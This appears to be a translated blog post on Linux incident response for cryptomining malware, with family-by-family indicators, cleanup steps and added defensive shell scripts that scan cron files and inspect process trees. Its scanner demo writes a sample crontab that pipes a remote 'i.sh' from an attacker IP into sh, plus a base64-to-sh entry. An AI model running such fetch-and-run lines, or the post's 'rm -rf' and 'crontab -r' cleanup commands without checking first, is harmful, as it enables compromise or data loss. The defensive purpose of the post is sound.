Linux Emergency Response Troubleshooting

Online search

Use Baidu/Google to search for the host's abnormal characteristics:

[1] Suspicious process name

[2] Suspicious domain name/IP traffic

[3] Suspicious timed tasks

[4] Suspicious file path

Suspicious process name

Use the top command to find the name of the process with the highest CPU usage, in this case the mining process sysupdate.

Then search for the keyword "sysupdate mining".

Suspicious domain/IP traffic

Search for the domain name in the gateway alert, in this case w.3ei.xyz:43768/crontab.sh.

Use the netstat -antp command to look for suspicious network connections, in this case 136.243.90.99.

Suspicious cron job

Use the crontab -l command to view the host's scheduled tasks and search for suspicious entries, in this case 45.79.9.153:8000/i.sh.

Suspicious file path

Look for suspicious files/folders in the /tmp/ and /root/ directories, in this case .firefoxcatche.

Characteristics of prevalent virus families

Virus families with suspicious scheduled tasks

DDG

The scheduled task contains the string i.sh.

SystemdMiner

There are base64-encoded malicious sh scripts in the /var/spool/cron/ and /etc/cron.d/ directories.


StartMiner

There is a scheduled task containing the string start.jpg.

LSDMiner

In the early version, the scheduled task contains the string pastebin.com.

In the intermediate version, the scheduled task contains the string lsd.systemten.org.

In the latest version, the scheduled task contains the string aliyun.one.

XorDDos

The cron task contains the string gcc.sh.

Virus families with suspicious filenames

Billgates

There are gates.lod and moni.lod files in the /tmp directory.

DDG

There are ELF files named ddgs. followed by digits in the /tmp directory.

SystemdMiner

There are sh scripts with random names in the /root and /opt directories.

StartMiner

There are virus files named x86_* in the /tmp directory. 

Clearing steps

Remove the virus in three steps:

[1] Locate the mining process & virus file

[2] Clear virus process & files

[3] Check scheduled tasks

Locate mining process & virus files

Use the top command to locate the mining process: the one with the highest CPU usage.

Use the ls -l /proc/[pid]/exe command to locate the file path of its binary.

Clear virus process & files

Use the command kill -9 [pid] to end the virus process, and use the command rm -rf [filepath/dir_path] to delete the corresponding file/folder.

Check scheduled tasks

Run the command crontab -l to check whether there are suspicious scheduled tasks on the host.

Use the command ls -l /etc/cron.d to view suspicious cron job files. 

Use the command crontab -r to clear the scheduled tasks (PS: only after confirming that the host has no business scheduled tasks).

Or use the command grep -r "[keyword]" /var/spool/cron to find the file containing the specified scheduled task, then delete only that entry.

Use the command rm /etc/cron.d/[file] to delete the cron task file.
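As an added example (not from the original post), a shell scan over cron locations for the persistence indicators the family list above names (i.sh, start.jpg, pastebin.com, lsd.systemten.org, aliyun.one, gcc.sh, and base64-encoded scripts); the sample crontab files it creates are constructed for the demo, and the function names are this example's own.

```shell
#!/bin/sh
# Added example: scan cron files for the indicators listed in the family
# section. Case-insensitive regex alternation; "base64" catches the
# SystemdMiner-style encoded scripts.
CRON_IOCS='i\.sh|start\.jpg|pastebin\.com|lsd\.systemten\.org|aliyun\.one|gcc\.sh|base64'

# scan_cron PATH... : print file:line:entry for every matching cron line.
# Accepts files or directories; missing paths are skipped silently.
scan_cron() {
    for p in "$@"; do
        [ -e "$p" ] || continue
        # -H file name, -n line number, -i ignore case, -E extended regex
        find "$p" -type f -exec grep -HnEi "$CRON_IOCS" {} + 2>/dev/null || true
    done
}

# cron_hit_count PATH... : number of matching lines (0 when clean).
cron_hit_count() { scan_cron "$@" | wc -l | tr -d ' '; }

# make_demo_cron : constructed sample data in a temp dir; prints its path.
# One DDG-style user crontab (modelled on the entry quoted above), one
# base64-encoded entry (decodes to a harmless echo), one legitimate job.
make_demo_cron() {
    t=$(mktemp -d)
    mkdir -p "$t/spool" "$t/cron.d"
    printf '*/15 * * * * curl -fsSL http://45.79.9.153:8000/i.sh | sh\n' > "$t/spool/root"
    printf '* * * * * root echo ZWNobyBoaQo= | base64 -d | sh\n' > "$t/cron.d/system"
    printf '0 2 * * * root /usr/local/bin/backup.sh\n' > "$t/cron.d/backup"
    echo "$t"
}

# On a real host, cover every user's crontab (crontab -l shows only the
# current user's): /var/spool/cron (RHEL) or /var/spool/cron/crontabs
# (Debian), plus /etc/cron.d and /etc/crontab.
# scan_cron /var/spool/cron /var/spool/cron/crontabs /etc/cron.d /etc/crontab

demo=$(make_demo_cron)
scan_cron "$demo/spool" "$demo/cron.d"
echo "hits: $(cron_hit_count "$demo/spool" "$demo/cron.d")"   # 2
rm -rf "$demo"
```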

File & scheduled task deletion fails

Deleting the file reports "Operation not permitted" because the file has the i (immutable) or a (append-only) attribute set; once these two attributes are removed, the file can be deleted.

Deleting scheduled tasks reports insufficient permissions.

Use lsattr to view the file attributes and chattr to clear them; the deletion then succeeds.

Files & scheduled tasks reappear after deletion

There are two situations in which files & scheduled tasks reappear after deletion: the virus has hijacked system files, or a residual virus process keeps recreating the virus files.

The ss, netstat, ps and lsof commands have been replaced with virus files; the tampered binaries need to be deleted and clean copies put back.

There are download processes such as curl and wget that repeatedly download the virus files.

It is also possible that a malicious guardian process is doing this, so kill the suspicious process first.

After the virus process is killed, it is started again

Keywords to search for suspicious processes on the host: sh, wget, curl, xmr, mine, ssh.

Find the parent process and end the entire process tree; in the example shown, all the processes in red font need to be killed.
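Added example (not from the original post) for the two steps above: resolve the binary behind a PID via /proc/[pid]/exe and walk the process tree in both directions, so the guardian parent and any children are ended together; the function names are this example's own.

```shell
#!/bin/sh
# Added example: everything here reads /proc directly, so it still works
# when the ps binary has been tampered with.

# exe_path PID : target of /proc/PID/exe. A target ending in "(deleted)"
# means the binary was removed after launch, common for mining droppers.
exe_path() { readlink "/proc/$1/exe" 2>/dev/null || echo "(unreadable)"; }

# ppid_of PID : parent PID from /proc/PID/status (empty if PID is gone).
ppid_of() { awk '/^PPid:/ {print $2}' "/proc/$1/status" 2>/dev/null; }

# ancestors PID : PID followed by each parent up to PID 1.
ancestors() {
    p=$1
    while [ -n "$p" ] && [ "$p" -gt 0 ]; do
        echo "$p"
        if [ "$p" -eq 1 ]; then break; fi
        p=$(ppid_of "$p")
    done
}

# descendants PID : children, grandchildren, ... of PID, found by matching
# PPid across /proc. They belong to the same tree and must be ended too.
descendants() {
    for d in /proc/[0-9]*; do
        c=${d#/proc/}
        [ "$(ppid_of "$c")" = "$1" ] || continue
        echo "$c"
        descendants "$c"
    done
}

# report PID : what to record before kill -9: binary, command line, tree.
report() {
    echo "pid $1 exe: $(exe_path "$1")"
    echo "cmdline: $(tr '\0' ' ' < "/proc/$1/cmdline" 2>/dev/null)"
    echo "ancestors (kill the topmost non-system one first):"
    ancestors "$1" | sed 's/^/  /'
    echo "descendants (kill together with it):"
    descendants "$1" | sed 's/^/  /'
}

# Demo on the current shell; on an incident host pass the PID seen in top.
report "$$"
```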

The host freezes but the mining process cannot be found

The host is abnormal but no suspicious process can be found. It is likely that the virus has hijacked system commands to hide it; use the busybox tool to check.

The CPU usage of the system is high, but no mining process is found.

Use busybox's top command to discover the mining process and its parent process.

busybox download address:

wget http://www.busybox.net/downloads/binaries/1.31.0-defconfig-multiarch-musl/busybox-x86_64 
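Added example (not from the original post): a scriptable version of the same idea as comparing with busybox, cross-checking the PIDs that ps reports against the kernel's own list under /proc; PS_BIN and the function names are this example's own.

```shell
#!/bin/sh
# Added example: a process present in /proc but missing from ps output points
# at a tampered ps (or a preload hook hiding it). Reading /proc ourselves needs
# nothing beyond the shell and coreutils, so it does not depend on ps's honesty.

# PS_BIN : the ps to audit; point it at another binary to compare views.
PS_BIN=${PS_BIN:-ps}

# proc_pids : numeric /proc entries, i.e. the kernel's process list.
# Plain (lexical) sort throughout so comm(1) agrees on the ordering.
proc_pids() { for d in /proc/[0-9]*; do echo "${d#/proc/}"; done | sort; }

# ps_pids : PIDs as reported by the audited ps, one per line.
ps_pids() { $PS_BIN -e -o pid= 2>/dev/null | tr -d ' ' | sort; }

# hidden_pids : PIDs present in /proc both before and after running ps yet
# absent from its output. Two kernel snapshots filter out processes that
# started or exited during the comparison (a race, not a rootkit).
hidden_pids() {
    t=$(mktemp -d)
    proc_pids > "$t/before"
    ps_pids   > "$t/ps"
    proc_pids > "$t/after"
    sort "$t/before" "$t/after" | uniq -d > "$t/stable"   # in both snapshots
    comm -23 "$t/stable" "$t/ps"                          # stable, not in ps
    rm -rf "$t"
}

# hidden_count : number of such PIDs; 0 is the expected result on a clean host.
hidden_count() { hidden_pids | wc -l | tr -d ' '; }

# describe_pid PID : name and binary straight from /proc, for triage of a hit.
describe_pid() {
    printf '%s %s %s\n' "$1" "$(cat "/proc/$1/comm" 2>/dev/null)" \
        "$(readlink "/proc/$1/exe" 2>/dev/null || echo '?')"
}

for pid in $(hidden_pids); do describe_pid "$pid"; done
echo "hidden from $PS_BIN: $(hidden_count)"
```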

The host is infected again after cleaning

If you are sure the virus on the host has been cleaned but it gets infected again, the virus must have re-entered through the network; check ssh-related risks and vulnerabilities.

Check whether ssh uses a weak password, and whether an unknown passwordless-login public key has been added to ~/.ssh/authorized_keys.

Redis unauthorized access vulnerability


Origin blog.csdn.net/jd_cx/article/details/126509245